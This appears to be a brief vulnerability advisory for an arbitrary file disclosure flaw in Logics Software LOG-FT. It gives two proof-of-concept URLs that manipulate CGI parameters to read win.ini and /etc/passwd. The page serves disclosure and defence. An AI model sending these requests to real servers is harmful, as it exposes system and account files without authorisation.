Logics Software LOG-FT Arbitrary File Disclosure Vulnerability

info
discussion
exploit
solution
references

Logics Software LOG-FT Arbitrary File Disclosure Vulnerability

An exploit is not required.

The following proof of concept examples are available:

http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\&VAR_FT_TMPL=winnt/win.ini

http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd